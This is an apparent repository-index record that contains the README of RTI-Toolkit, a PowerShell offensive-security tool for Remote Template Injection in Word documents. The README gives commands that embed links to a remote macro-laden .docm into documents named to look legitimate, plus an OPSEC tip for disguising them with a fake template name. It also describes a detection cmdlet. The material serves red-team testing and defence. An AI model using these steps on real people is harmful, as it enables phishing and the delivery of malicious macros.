{"id":20068266,"url":"https://github.com/nickvourd/rti-toolkit","last_synced_at":"2025-05-05T19:31:05.024Z","repository":{"id":197086939,"uuid":"677702468","full_name":"nickvourd/RTI-Toolkit","owner":"nickvourd","description":"Remote Template Injection Toolkit","archived":false,"fork":false,"pushed_at":"2024-04-07T13:18:41.000Z","size":1975,"stargazers_count":23,"open_issues_count":0,"forks_count":4,"subscribers_count":2,"default_branch":"main","last_synced_at":"2024-04-07T20:47:21.851Z","etag":null,"topics":["initial-access","macros","microsoft","offensive-security","pentest-tool","pentesting","phishing","phishing-attacks","phishing-detection","phishing-kit","powershell","powershell-module","powershell-script","redteam","redteam-tools","redteaming","remote-template","remote-template-injection","windows"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nickvourd.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2023-08-12T10:55:31.000Z","updated_at":"2024-04-07T20:47:21.852Z","dependencies_parsed_at":null,"dependency_job_id":"2364ab78-dc00-4ff2-9545-7fa61ac3732c","html_url":"https://github.com/nickvourd/RTI-Toolkit","commit_stats":null,"previous_names":["nickvourd/rti-toolkit"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nickvourd%2FRTI-Toolkit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nickvourd%2FRTI-Toolkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nickvourd%2FRTI-Toolkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nickvourd%2FRTI-Toolkit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nickvourd","download_url":"https://codeload.github.com/nickvourd/RTI-Toolkit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":224461759,"owners_count":17315116,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["initial-access","macros","microsoft","offensive-security","pentest-tool","pentesting","phishing","phishing-attacks","phishing-detection","phishing-kit","powershell","powershell-module","powershell-script","redteam","redteam-tools","redteaming","remote-template","remote-template-injection","windows"],"created_at":"2024-11-13T14:05:56.928Z","updated_at":"2024-11-13T14:05:57.613Z","avatar_url":"https://github.com/nickvourd.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# RTI-Toolkit\n\nRemote Template Injection Toolkit\n\n\u003cp align=\"center\"\u003e\n  \u003cimg width=\"350\" height=\"350\" src=\"https://github.com/nickvourd/RTI-Toolkit/blob/main/Pictures/injection-Logo.png\"\u003e\n\u003c/p\u003e\n\n## Description\n\nRTI-Toolkit is an open-source PowerShell toolkit for Remote Template Injection attack. This toolkit includes a PowerShell script named `PS-Templator.ps1` which can be used from both an attacking and defensive perspective.\n\nThe following tables presents the main modules (cmdlets) of `PS-Templator.ps1`:\n\n| Cmdlet | Description | Prespective |\n| -------|:-----------:|:-----------:|\n| [Invoke-Template](#invoke-template) | Implements remote template links within default Office Word templates  | Attacking |\n| [Invoke-Regular](#invoke-regular) | Implements remote template links within regular Office Word documents without template | Attacking |\n| [Invoke-Identify](#invoke-identify) | Indentifies remote template links within Office Word docx documents with/without template | Defensive |\n\n⚠️ `PS-Templator.ps1` supports only DOCX files.\n\n## Version\n\n### 1.0.0\n\n## License\n\nThis tool is licensed under the [![License: MIT](https://img.shields.io/badge/MIT-License-yellow.svg)](LICENSE).\n\n## Acknowledgement\n\nSpecial thanks to my friends [@Papadope9](https://twitter.com/Papadope9) and [Stavros Gkounis (a.k.a purpl3ph03n1x)](https://www.linkedin.com/in/stavros-gkounis-603026a6/), who provided invaluable assistance during the beta testing phase of the tool.\n\nThis tool was inspired during an iCAST Red Teaming Assessment with [@S1ckB0y1337](https://twitter.com/S1ckB0y1337) a few years ago.\n\nSupernova was created with ❤️ by [@nickvourd](https://twitter.com/nickvourd).\n\n## Table of Contents\n- [RTI-Toolkit](#rti-toolkit)\n  - [Description](#description)\n  - [Version](#version)\n  - [License](#license)\n  - [Acknowledgement](#acknowledgement)\n  - [Table of Contents](#table-of-contents)\n  - [Remote Template Injection (RTI)](#remote-template-injection-rti)\n  - [Installation](#installation)\n  - [Cmdlets](#cmdlets)\n    - [Invoke-Template](#invoke-template)\n      - [Invoke-Template Example](#invoke-template-example)\n    - [Invoke-Regular](#invoke-regular)\n      - [Invoke-Regular Example](#invoke-regular-example)\n      - [Invoke-Regular Example 2](#invoke-regular-example-2)\n    - [Invoke-Identify](#invoke-identify)\n      - [Invoke-Identify Example](#invoke-identify-example)\n      - [Invoke-Identify Example 2](#invoke-identify-example-2)\n  - [References](#references)\n\n## Remote Template Injection (RTI)\n\nRemote Template Injection (RTI) in the context of Microsoft Office refers to a specific type of security vulnerability that can be exploited through malicious templates in Office documents (e.g., Word, Excel, PowerPoint).\n\nFor example, in a DOCX file, the content is stored in XML format within the archive, and some of these XML files may reference external resources or templates. Attackers can indeed manipulate these XML files to insert malicious links or content that can potentially exploit vulnerabilities or deceive users. \n\nThis is a Macro-Based attack.\n\n## Installation\n\nTo load `PS-Templator.ps1` as a module into memory, run the following command:\n```\nImport-Module .\\PS-Templator.ps1\n```\n\n:information_source: `PS-Templator.ps1` works without the necessity of installing any additional dependencies.\u003cbr /\u003e\u003cbr /\u003e\n:information_source: `PS-Templator.ps1` works as PowerShell module.\u003cbr /\u003e\u003cbr /\u003e\n:information_source: `PS-Templator.ps1` tested on Windows 10 machine with Office 2019 Professional plus.\n\n## Cmdlets\n\n### Invoke-Template\n\n`Invoke-Template` is a cmdlet that implements remote template links within default Office Word templates.\n\n#### Invoke-Template Example\n\nAssuming that you have a default Word template, one like them:\n\n![All Words Templates](/Pictures/All-Word-Templates.png)\n\nSaved as, for example, 'Name.docx':\n\n![Default Word Template Document](/Pictures/Default-Word-Template.png)\n\nIf you use `Invoke-Template` cmdlet you can insert a malicious link within this docx:\n\n⚠️ Before running `Invoke-Template`, please make sure to save the document and close it (terminate its process).\n\n```\nInvoke-Template -InputDoc Name.docx -Link \"https://192.168.1.3:8080/Doc1.docm\" -Output C:\\Users\\User\\Desktop\\LegitDocument.docx\n```\n\nOutcome:\n\n![Invoke-Template-1](/Pictures/Invoke-Template-1.png)\n\nAs you can see, the Invoke-Template module keeps a backup of the original document and provides the full path to the malicious document.\n\nFrom debugging prespective, if you connvert the malicious docx to zip archive and go into /word/_rels/settings.xml.rels, you can see the malicious link:\n\n![Invoke-Template-Debug](/Pictures/Invoke-Template-Debug.png)\n\n### Invoke-Regular\n\n`Invoke-Regular` is a cmdlet that implements remote template links within default Office Word documents without templates.\n\n#### Invoke-Regular Example\n\nAssuming that you have a default Word document without a template, like this:\n\n![Blank Document](/Pictures/Blank-Document.png)\n\nSaved as, for example, 'Doc1.docx':\n\n![Word Document](/Pictures/Word-Document.png)\n\nIf you use `Invoke-Regular` cmdlet you can insert a malicious link within this docx:\n\n⚠️ Before running `Invoke-Regular`, please make sure to save the document and close it (terminate its process).\n\n```\nInvoke-Regular -InputDoc C:\\Users\\User\\Desktop\\Doc1.docx -Link \"http://192.168.1.3:8080/Doc1.docm\" -Output Nikos2.docx\n```\n\nOutcome:\n\n![Invoke-Regular-1](/Pictures/Invoke-Regular-1.png)\n\nAs you can see, the Invoke-Regular module keeps a backup of the original document and provides the full path to the malicious document.\n\nFrom debugging prespective, if you connvert the malicious docx to zip archive and go into /word/_rels/settings.xml.rels, you can see the malicious link:\n\n![Invoke-Regular-Debug-1](/Pictures/Invoke-Regular-Debug-1.png)\n\n#### Invoke-Regular Example 2\n\nFrom an OPSEC perspective, you can use `-TemplateName` in conjunction with the `Invoke-Regular` module. This will make your malicious document appear more legitimate if someone try to analyze it.\n\nHere is an example:\n\n```\nInvoke-Regular -InputDoc C:\\Users\\User\\Desktop\\Doc1.docx -Link \"http://192.168.1.3:8080/Doc1.docm\" -Output Legittemplate.dotx\n```\n\nOutcome:\n\n![Invoke-Regular-Example-2](/Pictures/Invoke-Regular-Example2.png)\n\nFrom debugging prespective, if you connvert the malicious docx to zip archive and go into /docProps/app.xml, you can see the fake template name:\n\n![Invoke-Regular-Fake-Template-Name](/Pictures/Invoke-Regular-Fake-Template-Name.png)\n\n### Invoke-Identify\n\n`Invoke-identify` is a cmdlet that indentifies remote template links within Office Word docx documents with/without template.\n\n#### Invoke-Identify Example\n\nAssuming that you have a malicious Word document:\n\n```\nInvoke-Identify -InputDoc LegitDocument.docx -Output C:\\Users\\User\\Desktop\\output.txt\n```\n\nOutcome:\n\n![Invoke-Identify Malicous Example](/Pictures/Invoke-Identify-Malicious-Example.png)\n\n#### Invoke-Identify Example 2\n\nAssuming that you have a non-malicious Word document:\n\n```\nInvoke-Identify -InputDoc Name.docx -Output C:\\Users\\User\\Desktop\\output2.txt\n```\n\nOutcome:\n\n![Invoke-Identify Clean Example](/Pictures/Invoke-Identify-Clean-Example.png)\n\n## References\n- [ired.team](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros)\n- [dmcxblue.gitbook.io](https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1221-template-injection)\n- [john-woodman.com](https://john-woodman.com/research/vba-macro-remote-template-injection/)\n- [remoteInjector GitHub by John Woodman](https://github.com/JohnWoodman/remoteInjector)\n- [Invoke-Templator GitHub by Outflanknl](https://github.com/outflanknl/Invoke-Templator)\n- [attack.mitre.org](https://attack.mitre.org/techniques/T1221/)\n- [BadAssMacros GitHub by Inf0secRabbit](https://github.com/Inf0secRabbit/BadAssMacros)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnickvourd%2Frti-toolkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnickvourd%2Frti-toolkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnickvourd%2Frti-toolkit/lists"}